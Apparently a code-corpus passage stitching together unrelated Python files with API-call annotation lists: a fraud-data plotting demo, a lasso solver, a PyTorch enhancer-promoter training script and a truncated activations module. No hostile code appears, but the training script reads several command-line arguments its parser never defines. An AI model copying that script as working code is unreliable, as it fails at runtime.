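# the real transaction logs; the values below are made up for illustration.
if __name__ == "__main__":
    demo = pd.DataFrame(
        {'all': [0.7, 0.2, 0.1], 'non-fraud': [0.75, 0.2, 0.05], 'fraud': [0.3, 0.3, 0.4]},
        index=['low', 'mid', 'high'])
    plot_bar_trans_prob(demo, col_name='Amount bucket', file_name='demo')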
|
[
"numpy.sum",
"pandas.read_csv",
"matplotlib.pyplot.bar",
"matplotlib.pyplot.figure",
"os.path.join",
"pandas.DataFrame",
"matplotlib.pyplot.close",
"os.path.dirname",
"os.path.exists",
"numpy.cumsum",
"numpy.intersect1d",
"matplotlib.pyplot.xticks",
"numpy.average",
"matplotlib.pyplot.legend",
"pandas.to_datetime",
"matplotlib.pyplot.ylabel",
"matplotlib.pyplot.subplot",
"os.makedirs",
"numpy.zeros",
"matplotlib.pyplot.xlabel"
] |
[((298, 332), 'os.path.join', 'join', (['FOLDER_REAL_DATA', '"""analysis"""'], {}), "(FOLDER_REAL_DATA, 'analysis')\n", (302, 332), False, 'from os.path import join, dirname, exists\n'), ((357, 392), 'os.path.join', 'join', (['pardir', '"""experiments/results"""'], {}), "(pardir, 'experiments/results')\n", (361, 392), False, 'from os.path import join, dirname, exists\n'), ((631, 679), 'os.path.join', 'join', (['FOLDER_REAL_DATA', '"""anonymized_dataset.csv"""'], {}), "(FOLDER_REAL_DATA, 'anonymized_dataset.csv')\n", (635, 679), False, 'from os.path import join, dirname, exists\n'), ((696, 741), 'os.path.join', 'join', (['FOLDER_REAL_DATA', '"""transaction_log.csv"""'], {}), "(FOLDER_REAL_DATA, 'transaction_log.csv')\n", (700, 741), False, 'from os.path import join, dirname, exists\n'), ((763, 812), 'os.path.join', 'join', (['FOLDER_SIMULATOR_LOG', '"""transaction_log.csv"""'], {}), "(FOLDER_SIMULATOR_LOG, 'transaction_log.csv')\n", (767, 812), False, 'from os.path import join, dirname, exists\n'), ((170, 187), 'os.path.dirname', 'dirname', (['__file__'], {}), '(__file__)\n', (177, 187), False, 'from os.path import join, dirname, exists\n'), ((232, 249), 'os.path.dirname', 'dirname', (['__file__'], {}), '(__file__)\n', (239, 249), False, 'from os.path import join, dirname, exists\n'), ((1004, 1021), 'pandas.read_csv', 'pd.read_csv', (['file'], {}), '(file)\n', (1015, 1021), True, 'import pandas as pd\n'), ((1095, 1135), 'pandas.to_datetime', 'pd.to_datetime', (["dataset01['Global_Date']"], {}), "(dataset01['Global_Date'])\n", (1109, 1135), True, 'import pandas as pd\n'), ((1166, 1205), 'pandas.to_datetime', 'pd.to_datetime', (["dataset01['Local_Date']"], {}), "(dataset01['Local_Date'])\n", (1180, 1205), True, 'import pandas as pd\n'), ((1573, 1618), 'os.path.join', 'join', (['FOLDER_REAL_DATA', '"""transaction_log.csv"""'], {}), "(FOLDER_REAL_DATA, 'transaction_log.csv')\n", (1577, 1618), False, 'from os.path import join, dirname, exists\n'), ((2327, 2364), 'pandas.DataFrame', 'pd.DataFrame', ([], {'columns': 'data_stats_cols'}), '(columns=data_stats_cols)\n', (2339, 2364), True, 'import pandas as pd\n'), ((4864, 4939), 'pandas.DataFrame', 'pd.DataFrame', (['(0)'], {'index': 'possible_vals', 'columns': "['all', 'non-fraud', 'fraud']"}), "(0, index=possible_vals, columns=['all', 'non-fraud', 'fraud'])\n", (4876, 4939), True, 'import pandas as pd\n'), ((5253, 5287), 'numpy.sum', 'np.sum', (['trans_count.values'], {'axis': '(0)'}), '(trans_count.values, axis=0)\n', (5259, 5287), True, 'import numpy as np\n'), ((5637, 5664), 'matplotlib.pyplot.figure', 'plt.figure', ([], {'figsize': '(10, 7)'}), '(figsize=(10, 7))\n', (5647, 5664), True, 'import matplotlib.pyplot as plt\n'), ((5994, 6005), 'matplotlib.pyplot.close', 'plt.close', ([], {}), '()\n', (6003, 6005), True, 'import matplotlib.pyplot as plt\n'), ((6150, 6162), 'matplotlib.pyplot.figure', 'plt.figure', ([], {}), '()\n', (6160, 6162), True, 'import matplotlib.pyplot as plt\n'), ((6373, 6425), 'matplotlib.pyplot.xticks', 'plt.xticks', (['[0, 1, 2]', "['all', 'non-fraud', 'fraud']"], {}), "([0, 1, 2], ['all', 'non-fraud', 'fraud'])\n", (6383, 6425), True, 'import matplotlib.pyplot as plt\n'), ((6434, 6449), 'matplotlib.pyplot.ylabel', 'plt.ylabel', (['"""%"""'], {}), "('%')\n", (6444, 6449), True, 'import matplotlib.pyplot as plt\n'), ((6526, 6538), 'matplotlib.pyplot.legend', 'plt.legend', ([], {}), '()\n', (6536, 6538), True, 'import matplotlib.pyplot as plt\n'), ((6678, 6689), 'matplotlib.pyplot.close', 'plt.close', ([], {}), '()\n', 
(6687, 6689), True, 'import matplotlib.pyplot as plt\n'), ((563, 577), 'os.path.exists', 'exists', (['folder'], {}), '(folder)\n', (569, 577), False, 'from os.path import join, dirname, exists\n'), ((587, 603), 'os.makedirs', 'makedirs', (['folder'], {}), '(folder)\n', (595, 603), False, 'from os import makedirs, pardir\n'), ((3853, 3876), 'numpy.average', 'np.average', (["d['Amount']"], {}), "(d['Amount'])\n", (3863, 3876), True, 'import numpy as np\n'), ((5696, 5720), 'matplotlib.pyplot.subplot', 'plt.subplot', (['(3)', '(1)', '(i + 1)'], {}), '(3, 1, i + 1)\n', (5707, 5720), True, 'import matplotlib.pyplot as plt\n'), ((5823, 5853), 'matplotlib.pyplot.ylabel', 'plt.ylabel', (['"""num transactions"""'], {}), "('num transactions')\n", (5833, 5853), True, 'import matplotlib.pyplot as plt\n'), ((6282, 6373), 'matplotlib.pyplot.bar', 'plt.bar', (['(0, 1, 2)', 'trans_frac.values[i]'], {'label': 'trans_frac.index[i]', 'bottom': 'bottoms[i]'}), '((0, 1, 2), trans_frac.values[i], label=trans_frac.index[i], bottom=\n bottoms[i])\n', (6289, 6373), True, 'import matplotlib.pyplot as plt\n'), ((5885, 5905), 'matplotlib.pyplot.xlabel', 'plt.xlabel', (['col_name'], {}), '(col_name)\n', (5895, 5905), True, 'import matplotlib.pyplot as plt\n'), ((6188, 6199), 'numpy.zeros', 'np.zeros', (['(3)'], {}), '(3)\n', (6196, 6199), True, 'import numpy as np\n'), ((6201, 6230), 'numpy.cumsum', 'np.cumsum', (['trans_frac'], {'axis': '(0)'}), '(trans_frac, axis=0)\n', (6210, 6230), True, 'import numpy as np\n'), ((3426, 3468), 'numpy.intersect1d', 'np.intersect1d', (['cards_genuine', 'cards_fraud'], {}), '(cards_genuine, cards_fraud)\n', (3440, 3468), True, 'import numpy as np\n')]
|
import numpy as np
from numpy import linalg as la
import invprob.sparse as sparse
def fb_lasso(A, y, reg_param, iter_nb, x_ini=None, inertia=False, verbose=False):
''' Use the Forward-Backward algorithm to find a minimizer of:
reg_param*norm(x,1) + 0.5*norm(Ax-y,2)**2
Eventually outputs the functional values and support of the iterates
while running the method
reg_param is either a number, in which case we use it all along the iterations
or a sequence of size iter_nb
'''
# Manage optional input/output
if verbose: # Optional output
regret = np.zeros(iter_nb)
sparsity = np.zeros(iter_nb)
support = []
path = np.zeros((A.shape[1], iter_nb))
if x_ini is not None: # Optional initialization
x = x_ini
else:
x = np.zeros((A.shape[1], 1))
if isinstance(reg_param, (int, float)): # Fixed or not parameter
param = reg_param * np.ones(iter_nb)
else:
param = reg_param
if inertia:
alpha = [k/(k+3) for k in np.arange(iter_nb)] # asymptotically equivalent to Nesterov
else:
alpha = np.zeros(iter_nb) # no inertia
# The core of the algorithm
stepsize = 0.5 * 2 / (la.norm(A, 2)**2)
T = A.T@A
ATy = A.T@y
gradient = lambda x: x - stepsize*(T@x - ATy)
forward_backward = lambda x, param: sparse.soft_thresholding(gradient(x), param*stepsize)
x_old = x
for k in range(iter_nb):
if verbose:
regret[k] = 0.5 * la.norm(A@x - y, 2)**2 + param[k] * la.norm(x, 1)
support.append( tuple(np.where(np.abs(x) > 1e-15)[0]) )
sparsity[k] = len(support[k])
path[:, k] = x.reshape((x.shape[0]))
x, x_old = forward_backward( (1+alpha[k])*x - alpha[k]*x_old, param[k] ), x
# Output
if verbose:
details = {
"function_value": regret,
"iterate_support": support,
"iterate_sparsity": sparsity,
"iterate_path": path
}
return x, details
else:
return x
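# ---------------------------------------------------------------------------
# Usage sketch (not part of the original module): try to recover a 3-sparse
# vector from a random Gaussian design. Assumes the invprob package imported
# above is available; reg_param and iter_nb are arbitrary illustration values.
if __name__ == "__main__":
    rng = np.random.default_rng(0)
    A = rng.standard_normal((50, 200))
    x_true = np.zeros((200, 1))
    x_true[[3, 50, 120], 0] = [1.0, -2.0, 1.5]
    y = A @ x_true + 0.01 * rng.standard_normal((50, 1))
    x_hat = fb_lasso(A, y, reg_param=0.1, iter_nb=500, inertia=True)
    print("support of the estimate:", np.where(np.abs(x_hat) > 1e-3)[0])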
|
[
"numpy.abs",
"numpy.zeros",
"numpy.ones",
"numpy.arange",
"numpy.linalg.norm"
] |
[((628, 645), 'numpy.zeros', 'np.zeros', (['iter_nb'], {}), '(iter_nb)\n', (636, 645), True, 'import numpy as np\n'), ((665, 682), 'numpy.zeros', 'np.zeros', (['iter_nb'], {}), '(iter_nb)\n', (673, 682), True, 'import numpy as np\n'), ((719, 750), 'numpy.zeros', 'np.zeros', (['(A.shape[1], iter_nb)'], {}), '((A.shape[1], iter_nb))\n', (727, 750), True, 'import numpy as np\n'), ((844, 869), 'numpy.zeros', 'np.zeros', (['(A.shape[1], 1)'], {}), '((A.shape[1], 1))\n', (852, 869), True, 'import numpy as np\n'), ((1157, 1174), 'numpy.zeros', 'np.zeros', (['iter_nb'], {}), '(iter_nb)\n', (1165, 1174), True, 'import numpy as np\n'), ((968, 984), 'numpy.ones', 'np.ones', (['iter_nb'], {}), '(iter_nb)\n', (975, 984), True, 'import numpy as np\n'), ((1247, 1260), 'numpy.linalg.norm', 'la.norm', (['A', '(2)'], {}), '(A, 2)\n', (1254, 1260), True, 'from numpy import linalg as la\n'), ((1071, 1089), 'numpy.arange', 'np.arange', (['iter_nb'], {}), '(iter_nb)\n', (1080, 1089), True, 'import numpy as np\n'), ((1568, 1581), 'numpy.linalg.norm', 'la.norm', (['x', '(1)'], {}), '(x, 1)\n', (1575, 1581), True, 'from numpy import linalg as la\n'), ((1532, 1553), 'numpy.linalg.norm', 'la.norm', (['(A @ x - y)', '(2)'], {}), '(A @ x - y, 2)\n', (1539, 1553), True, 'from numpy import linalg as la\n'), ((1625, 1634), 'numpy.abs', 'np.abs', (['x'], {}), '(x)\n', (1631, 1634), True, 'import numpy as np\n')]
|
#!/usr/bin/env python3
import argparse, os, sys, time, shutil, tqdm
import warnings, json, gzip
import numpy as np
import copy
from sklearn.model_selection import GroupKFold
import torch
import torch.nn as nn
import torch.nn.functional as F
from torch.autograd import Variable
from torch.utils.data import DataLoader, Subset
import epi_models
import epi_dataset
import misc_utils
import functools
print = functools.partial(print, flush=True)
def split_train_valid_test(groups, train_keys, valid_keys, test_keys=None):
"""
    groups: array of length N (the number of samples) with each sample's group label
    train_keys / valid_keys / test_keys: lists of group labels assigned to the
        train / validation / test splits, respectively
    """
assert isinstance(train_keys, list)
assert isinstance(valid_keys, list)
assert test_keys is None or isinstance(test_keys, list)
index = np.arange(len(groups))
train_idx = index[np.isin(groups, train_keys)]
valid_idx = index[np.isin(groups, valid_keys)]
if test_keys is not None:
test_idx = index[np.isin(groups, test_keys)]
return train_idx, valid_idx, test_idx
else:
return train_idx, valid_idx
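# Example (illustration, values not from the original source): with
#   groups = np.array(["chr1", "chr2", "chr1", "chr3"])
# split_train_valid_test(groups, ["chr1"], ["chr2"], ["chr3"]) returns
# (array([0, 2]), array([1]), array([3])).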
def make_directory(in_dir):
if os.path.isfile(in_dir):
warnings.warn("{} is a regular file".format(in_dir))
return None
outdir = in_dir.rstrip('/')
if not os.path.isdir(outdir):
os.makedirs(outdir)
return outdir
def model_summary(model):
"""
model: pytorch model
"""
import torch
total_param = 0
trainable_param = 0
for i, p in enumerate(model.parameters()):
num_p = torch.numel(p)
if p.requires_grad:
trainable_param += num_p
total_param += num_p
return {'total_param': total_param, 'trainable_param': trainable_param}
def predict(model: nn.Module, data_loader: DataLoader, device=torch.device('cuda')):
model.eval()
result, true_label = None, None
for feats, _, enh_idxs, prom_idxs, labels in data_loader:
feats, labels = feats.to(device), labels.to(device)
# enh_idxs, prom_idxs = enh_idxs.to(device), prom_idxs.to(device)
pred = model(feats, enh_idx=enh_idxs, prom_idx=prom_idxs)
pred = pred.detach().cpu().numpy()
labels = labels.detach().cpu().numpy()
if result is None:
result = pred
true_label = labels
else:
result = np.concatenate((result, pred), axis=0)
true_label = np.concatenate((true_label, labels), axis=0)
return (result.squeeze(), true_label.squeeze())
def train_validate_test(
model, optimizer,
train_loader, valid_loader, test_loader,
num_epoch, patience, outdir,
checkpoint_prefix, device, use_scheduler=False) -> nn.Module:
bce_loss = nn.BCELoss()
mse_loss = nn.MSELoss()
wait = 0
best_epoch, best_val_auc, best_val_aupr = -1, -1, -1
if use_scheduler:
scheduler = torch.optim.lr_scheduler.CosineAnnealingWarmRestarts(optimizer, T_0=5, T_mult=2)
for epoch_idx in range(num_epoch):
model.train()
for feats, dists, enh_idxs, prom_idxs, labels in tqdm.tqdm(train_loader):
feats, dists, labels = feats.to(device), dists.to(device), labels.to(device)
if hasattr(model, "att_C"):
pred, pred_dists, att = model(feats, enh_idxs, prom_idxs, return_att=True)
attT = att.transpose(1, 2)
identity = torch.eye(att.size(1)).to(device)
identity = Variable(identity.unsqueeze(0).expand(labels.size(0), att.size(1), att.size(1)))
penal = model.l2_matrix_norm(torch.matmul(att, attT) - identity)
loss = bce_loss(pred, labels) + (model.att_C * penal / labels.size(0)).type(torch.cuda.FloatTensor) + mse_loss(dists, pred_dists)
del penal, identity
else:
pred = model(feats, dists)
loss = bce_loss(pred, labels)
optimizer.zero_grad()
loss.backward()
optimizer.step()
if use_scheduler:
scheduler.step()
model.eval()
valid_pred, valid_true = predict(model, valid_loader)
val_AUC, val_AUPR = misc_utils.evaluator(valid_true, valid_pred, out_keys=["AUC", "AUPR"])
print("\nvalid_result({})\t{:.4f}\t{:.4f}\t({})".format(epoch_idx, val_AUC, val_AUPR, time.asctime()))
if val_AUC + val_AUPR > best_val_auc + best_val_aupr:
wait = 0
best_epoch, best_val_auc, best_val_aupr = epoch_idx, val_AUC, val_AUPR
test_pred, test_true = predict(model, test_loader)
np.savetxt(
"{}/test_result.{}.txt.gz".format(outdir, epoch_idx),
X=np.concatenate((test_pred.reshape(-1, 1), test_true.reshape(-1, 1)), axis=1),
fmt="%.5f",
delimiter='\t'
)
test_AUC, test_AUPR = misc_utils.evaluator(test_true, test_pred, out_keys=["AUC", "AUPR"])
print("Test_result\t{:.4f}\t{:.4f}\t({})".format(test_AUC, test_AUPR, time.asctime()))
if use_scheduler:
torch.save({
"model_state_dict": model.state_dict(),
"optimizer_state_dict": optimizer.state_dict(),
"scheduler_state_dict": scheduler.state_dict()
}, "{}/checkpoint.{}.pt".format(outdir, epoch_idx))
else:
torch.save({
"model_state_dict": model.state_dict(),
"optimizer_state_dict": optimizer.state_dict()
}, "{}/checkpoint.{}.pt".format(outdir, epoch_idx))
else:
wait += 1
if wait >= patience:
print("Early stopped ({})".format(time.asctime()))
print("Best epoch/AUC/AUPR: {}\t{:.4f}\t{:.4f}".format(best_epoch, best_val_auc, best_val_aupr))
break
else:
print("Wait{} ({})".format(wait, time.asctime()))
def get_args():
p = argparse.ArgumentParser(formatter_class=argparse.ArgumentDefaultsHelpFormatter)
p.add_argument(
'--train',
required=True,
nargs='+'
)
p.add_argument(
'--valid',
required=True,
nargs='+'
)
p.add_argument(
"--test",
nargs='+',
default=None,
help="Optional test set"
)
p.add_argument('-b', "--batch-size", type=int, default=256)
p.add_argument('-c', "--config", required=True)
p.add_argument('-o', "--outdir", required=True)
p.add_argument("--threads", default=32, type=int)
    p.add_argument('--seed', type=int, default=2020)
    # The four options below are read later in the script (args.use_reverse,
    # args.aug_num, args.gpu, args.gpu_id) but were missing from the parser;
    # the defaults chosen here are assumptions.
    p.add_argument('--use-reverse', dest='use_reverse', action='store_true')
    p.add_argument('--aug-num', dest='aug_num', type=int, default=1)
    p.add_argument('--gpu', type=int, default=-1, help="-1 runs on CPU")
    p.add_argument('--gpu-id', dest='gpu_id', type=int, default=0)
return p
if __name__ == "__main__":
p = get_args()
args = p.parse_args()
np.random.seed(args.seed)
torch.manual_seed(args.seed)
config = json.load(open(args.config))
# all_data = epi_dataset.EPIDataset(**config["data_opts"])
train_config = config.copy()
train_config["data_opts"]["datasets"] = args.train
train_config["data_opts"]["use_reverse"] = args.use_reverse
train_config["data_opts"]["max_aug"] = args.aug_num
train_data = epi_dataset.EPIDataset(
**train_config["data_opts"]
)
train_loader = DataLoader(train_data, batch_size=args.batch_size, shuffle=True, num_workers=args.threads)
if args.test is None:
valid_test_config = copy.deepcopy(config)
valid_test_config["data_opts"]["datasets"] = args.valid
valid_test_data = epi_dataset.EPIDataset(
**valid_test_config["data_opts"]
)
valid_idx, test_idx = split_train_valid_test(
np.array(valid_test_data.metainfo["chrom"]),
train_keys=["chr{}".format(i).replace("23", "X") for i in range(1, 24, 2)],
valid_keys=["chr{}".format(i) for i in range(2, 22, 2)]
)
valid_data = Subset(valid_test_data, indices=valid_idx)
test_data = Subset(valid_test_data, indices=test_idx)
valid_loader = DataLoader(valid_data, batch_size=args.batch_size, shuffle=False)
test_loader = DataLoader(test_data, batch_size=args.batch_size, shuffle=False)
else:
valid_config = copy.deepcopy(config)
valid_config["data_opts"]["datasets"] = args.valid
valid_data = epi_dataset.EPIDataset(
**valid_config["data_opts"]
)
valid_loader = DataLoader(valid_data, batch_size=args.batch_size, shuffle=False, num_workers=args.threads)
test_config = copy.deepcopy(config)
test_config["data_opts"]["datasets"] = args.test
test_data = epi_dataset.EPIDataset(
**test_config["data_opts"]
)
test_loader = DataLoader(test_data, batch_size=args.batch_size, shuffle=False, num_workers=args.threads)
config["model_opts"]["in_dim"] = train_data.feat_dim
config["model_opts"]["seq_len"] = config["data_opts"]["seq_len"] // config["data_opts"]["bin_size"]
print("##{}".format(time.asctime()))
print("##command: {}".format(' '.join(sys.argv)))
print("##args: {}".format(args))
print("##config: {}".format(config))
print("##sample size: {}".format(len(train_data)))
print("## feature size: {}".format([v.size() for v in train_data.__getitem__(0)]))
if args.gpu == -1:
device = "cpu"
else:
os.environ["CUDA_VISIBLE_DEVICES"] = str(args.gpu_id)
device = "cuda"
device = torch.device(device)
model_class = getattr(epi_models, config["model_opts"]["model"])
model = model_class(**config["model_opts"]).to(device)
optimizer_params = {'lr': config["train_opts"]["learning_rate"], 'weight_decay': 0}
optimizer = torch.optim.Adam(model.parameters(), **optimizer_params)
print(model)
print(model_summary(model))
print(optimizer)
if not os.path.isdir(args.outdir):
args.outdir = make_directory(args.outdir)
train_validate_test(
model,
optimizer,
train_loader, valid_loader, test_loader,
num_epoch=config["train_opts"]["num_epoch"],
patience=config["train_opts"]["patience"],
outdir=args.outdir,
checkpoint_prefix="checkpoint",
device=device,
use_scheduler=config["train_opts"]["use_scheduler"]
)
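# ---------------------------------------------------------------------------
# Example invocation (sketch; the script name, dataset names, config file and
# output directory are placeholders, not taken from the original project):
#
#   python train.py --train GM12878 HeLa --valid K562 \
#       -c config.json -o results/run1 -b 128 --seed 2020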
|
[
"numpy.isin",
"numpy.random.seed",
"argparse.ArgumentParser",
"misc_utils.evaluator",
"os.path.isfile",
"torch.device",
"time.asctime",
"torch.nn.MSELoss",
"torch.nn.BCELoss",
"torch.utils.data.DataLoader",
"torch.matmul",
"functools.partial",
"copy.deepcopy",
"tqdm.tqdm",
"torch.manual_seed",
"numpy.concatenate",
"torch.utils.data.Subset",
"torch.numel",
"os.makedirs",
"os.path.isdir",
"torch.optim.lr_scheduler.CosineAnnealingWarmRestarts",
"epi_dataset.EPIDataset",
"numpy.array"
] |
[((409, 445), 'functools.partial', 'functools.partial', (['print'], {'flush': '(True)'}), '(print, flush=True)\n', (426, 445), False, 'import functools\n'), ((1081, 1103), 'os.path.isfile', 'os.path.isfile', (['in_dir'], {}), '(in_dir)\n', (1095, 1103), False, 'import argparse, os, sys, time, shutil, tqdm\n'), ((1739, 1759), 'torch.device', 'torch.device', (['"""cuda"""'], {}), "('cuda')\n", (1751, 1759), False, 'import torch\n'), ((2675, 2687), 'torch.nn.BCELoss', 'nn.BCELoss', ([], {}), '()\n', (2685, 2687), True, 'import torch.nn as nn\n'), ((2703, 2715), 'torch.nn.MSELoss', 'nn.MSELoss', ([], {}), '()\n', (2713, 2715), True, 'import torch.nn as nn\n'), ((5975, 6054), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {'formatter_class': 'argparse.ArgumentDefaultsHelpFormatter'}), '(formatter_class=argparse.ArgumentDefaultsHelpFormatter)\n', (5998, 6054), False, 'import argparse, os, sys, time, shutil, tqdm\n'), ((6773, 6798), 'numpy.random.seed', 'np.random.seed', (['args.seed'], {}), '(args.seed)\n', (6787, 6798), True, 'import numpy as np\n'), ((6803, 6831), 'torch.manual_seed', 'torch.manual_seed', (['args.seed'], {}), '(args.seed)\n', (6820, 6831), False, 'import torch\n'), ((7164, 7215), 'epi_dataset.EPIDataset', 'epi_dataset.EPIDataset', ([], {}), "(**train_config['data_opts'])\n", (7186, 7215), False, 'import epi_dataset\n'), ((7249, 7343), 'torch.utils.data.DataLoader', 'DataLoader', (['train_data'], {'batch_size': 'args.batch_size', 'shuffle': '(True)', 'num_workers': 'args.threads'}), '(train_data, batch_size=args.batch_size, shuffle=True,\n num_workers=args.threads)\n', (7259, 7343), False, 'from torch.utils.data import DataLoader, Subset\n'), ((9448, 9468), 'torch.device', 'torch.device', (['device'], {}), '(device)\n', (9460, 9468), False, 'import torch\n'), ((790, 817), 'numpy.isin', 'np.isin', (['groups', 'train_keys'], {}), '(groups, train_keys)\n', (797, 817), True, 'import numpy as np\n'), ((841, 868), 'numpy.isin', 'np.isin', (['groups', 'valid_keys'], {}), '(groups, valid_keys)\n', (848, 868), True, 'import numpy as np\n'), ((1229, 1250), 'os.path.isdir', 'os.path.isdir', (['outdir'], {}), '(outdir)\n', (1242, 1250), False, 'import argparse, os, sys, time, shutil, tqdm\n'), ((1260, 1279), 'os.makedirs', 'os.makedirs', (['outdir'], {}), '(outdir)\n', (1271, 1279), False, 'import argparse, os, sys, time, shutil, tqdm\n'), ((1490, 1504), 'torch.numel', 'torch.numel', (['p'], {}), '(p)\n', (1501, 1504), False, 'import torch\n'), ((2830, 2915), 'torch.optim.lr_scheduler.CosineAnnealingWarmRestarts', 'torch.optim.lr_scheduler.CosineAnnealingWarmRestarts', (['optimizer'], {'T_0': '(5)', 'T_mult': '(2)'}), '(optimizer, T_0=5, T_mult=2\n )\n', (2882, 2915), False, 'import torch\n'), ((3030, 3053), 'tqdm.tqdm', 'tqdm.tqdm', (['train_loader'], {}), '(train_loader)\n', (3039, 3053), False, 'import argparse, os, sys, time, shutil, tqdm\n'), ((4125, 4195), 'misc_utils.evaluator', 'misc_utils.evaluator', (['valid_true', 'valid_pred'], {'out_keys': "['AUC', 'AUPR']"}), "(valid_true, valid_pred, out_keys=['AUC', 'AUPR'])\n", (4145, 4195), False, 'import misc_utils\n'), ((7395, 7416), 'copy.deepcopy', 'copy.deepcopy', (['config'], {}), '(config)\n', (7408, 7416), False, 'import copy\n'), ((7507, 7563), 'epi_dataset.EPIDataset', 'epi_dataset.EPIDataset', ([], {}), "(**valid_test_config['data_opts'])\n", (7529, 7563), False, 'import epi_dataset\n'), ((7901, 7943), 'torch.utils.data.Subset', 'Subset', (['valid_test_data'], {'indices': 'valid_idx'}), '(valid_test_data, 
indices=valid_idx)\n', (7907, 7943), False, 'from torch.utils.data import DataLoader, Subset\n'), ((7964, 8005), 'torch.utils.data.Subset', 'Subset', (['valid_test_data'], {'indices': 'test_idx'}), '(valid_test_data, indices=test_idx)\n', (7970, 8005), False, 'from torch.utils.data import DataLoader, Subset\n'), ((8029, 8094), 'torch.utils.data.DataLoader', 'DataLoader', (['valid_data'], {'batch_size': 'args.batch_size', 'shuffle': '(False)'}), '(valid_data, batch_size=args.batch_size, shuffle=False)\n', (8039, 8094), False, 'from torch.utils.data import DataLoader, Subset\n'), ((8117, 8181), 'torch.utils.data.DataLoader', 'DataLoader', (['test_data'], {'batch_size': 'args.batch_size', 'shuffle': '(False)'}), '(test_data, batch_size=args.batch_size, shuffle=False)\n', (8127, 8181), False, 'from torch.utils.data import DataLoader, Subset\n'), ((8215, 8236), 'copy.deepcopy', 'copy.deepcopy', (['config'], {}), '(config)\n', (8228, 8236), False, 'import copy\n'), ((8317, 8368), 'epi_dataset.EPIDataset', 'epi_dataset.EPIDataset', ([], {}), "(**valid_config['data_opts'])\n", (8339, 8368), False, 'import epi_dataset\n'), ((8414, 8509), 'torch.utils.data.DataLoader', 'DataLoader', (['valid_data'], {'batch_size': 'args.batch_size', 'shuffle': '(False)', 'num_workers': 'args.threads'}), '(valid_data, batch_size=args.batch_size, shuffle=False,\n num_workers=args.threads)\n', (8424, 8509), False, 'from torch.utils.data import DataLoader, Subset\n'), ((8529, 8550), 'copy.deepcopy', 'copy.deepcopy', (['config'], {}), '(config)\n', (8542, 8550), False, 'import copy\n'), ((8628, 8678), 'epi_dataset.EPIDataset', 'epi_dataset.EPIDataset', ([], {}), "(**test_config['data_opts'])\n", (8650, 8678), False, 'import epi_dataset\n'), ((8723, 8817), 'torch.utils.data.DataLoader', 'DataLoader', (['test_data'], {'batch_size': 'args.batch_size', 'shuffle': '(False)', 'num_workers': 'args.threads'}), '(test_data, batch_size=args.batch_size, shuffle=False,\n num_workers=args.threads)\n', (8733, 8817), False, 'from torch.utils.data import DataLoader, Subset\n'), ((9843, 9869), 'os.path.isdir', 'os.path.isdir', (['args.outdir'], {}), '(args.outdir)\n', (9856, 9869), False, 'import argparse, os, sys, time, shutil, tqdm\n'), ((925, 951), 'numpy.isin', 'np.isin', (['groups', 'test_keys'], {}), '(groups, test_keys)\n', (932, 951), True, 'import numpy as np\n'), ((2287, 2325), 'numpy.concatenate', 'np.concatenate', (['(result, pred)'], {'axis': '(0)'}), '((result, pred), axis=0)\n', (2301, 2325), True, 'import numpy as np\n'), ((2351, 2395), 'numpy.concatenate', 'np.concatenate', (['(true_label, labels)'], {'axis': '(0)'}), '((true_label, labels), axis=0)\n', (2365, 2395), True, 'import numpy as np\n'), ((4854, 4922), 'misc_utils.evaluator', 'misc_utils.evaluator', (['test_true', 'test_pred'], {'out_keys': "['AUC', 'AUPR']"}), "(test_true, test_pred, out_keys=['AUC', 'AUPR'])\n", (4874, 4922), False, 'import misc_utils\n'), ((7656, 7699), 'numpy.array', 'np.array', (["valid_test_data.metainfo['chrom']"], {}), "(valid_test_data.metainfo['chrom'])\n", (7664, 7699), True, 'import numpy as np\n'), ((9001, 9015), 'time.asctime', 'time.asctime', ([], {}), '()\n', (9013, 9015), False, 'import argparse, os, sys, time, shutil, tqdm\n'), ((4290, 4304), 'time.asctime', 'time.asctime', ([], {}), '()\n', (4302, 4304), False, 'import argparse, os, sys, time, shutil, tqdm\n'), ((5005, 5019), 'time.asctime', 'time.asctime', ([], {}), '()\n', (5017, 5019), False, 'import argparse, os, sys, time, shutil, tqdm\n'), ((3532, 3555), 'torch.matmul', 
'torch.matmul', (['att', 'attT'], {}), '(att, attT)\n', (3544, 3555), False, 'import torch\n'), ((5713, 5727), 'time.asctime', 'time.asctime', ([], {}), '()\n', (5725, 5727), False, 'import argparse, os, sys, time, shutil, tqdm\n'), ((5932, 5946), 'time.asctime', 'time.asctime', ([], {}), '()\n', (5944, 5946), False, 'import argparse, os, sys, time, shutil, tqdm\n')]
|
""" TensorMONK :: layers :: Activations """
__all__ = ["Activations"]
import torch
import torch.nn as nn
import torch.nn.functional as F
def maxout(tensor: torch.Tensor) -> torch.Tensor:
if not tensor.size(1) % 2 == 0:
raise ValueError("MaxOut: tensor.size(1) must be divisible by n_splits"
": {}".format(tensor.size(1)))
return torch.max(*tensor.split(tensor.size(1)//2, 1))
class Activations(nn.Module):
r"""Activation functions. Additional activation functions (other than those
available in pytorch) are
:obj:`"hsigm"` & :obj:`"hswish"` (`"Searching for MobileNetV3"
<https://arxiv.org/pdf/1905.02244>`_),
:obj:`"maxo"` (`"Maxout Networks" <https://arxiv.org/pdf/1302.4389>`_),
:obj:`"mish"` (`"Mish: A Self Regularized Non-Monotonic Neural Activation
Function" <https://arxiv.org/pdf/1908.08681v1>`_),
:obj:`"squash"` (`"Dynamic Routing Between Capsules"
<https://arxiv.org/abs/1710.09829>`_) and
:obj:`"swish"` (`"SWISH: A Self-Gated Activation Function"
<https://arxiv.org/pdf/1710.05941v1>`_).
Args:
tensor_size (tuple, required): Input tensor shape in BCHW
(None/any integer >0, channels, height, width).
activation (str, optional): The list of activation options are
:obj:`"elu"`, :obj:`"gelu"`, :obj:`"hsigm"`, :obj:`"hswish"`,
:obj:`"lklu"`, :obj:`"maxo"`, :obj:`"mish"`, :obj:`"prelu"`,
:obj:`"relu"`, :obj:`"relu6"`, :obj:`"rmxo"`, :obj:`"selu"`,
:obj:`"sigm"`, :obj:`"squash"`, :obj:`"swish"`, :obj:`"tanh"`.
(default: :obj:`"relu"`)
elu_alpha (float, optional): (default: :obj:`1.0`)
lklu_negslope (float, optional): (default: :obj:`0.01`)
.. code-block:: python
import torch
import tensormonk
print(tensormonk.activations.Activations.METHODS)
tensor_size = (None, 16, 4, 4)
activation = "maxo"
maxout = tensormonk.activations.Activations(tensor_size, activation)
maxout(torch.randn(1, *tensor_size[1:]))
tensor_size = (None, 16, 4)
activation = "squash"
squash = tensormonk.activations.Activations(tensor_size, activation)
squash(torch.randn(1, *tensor_size[1:]))
tensor_size = (None, 16)
activation = "swish"
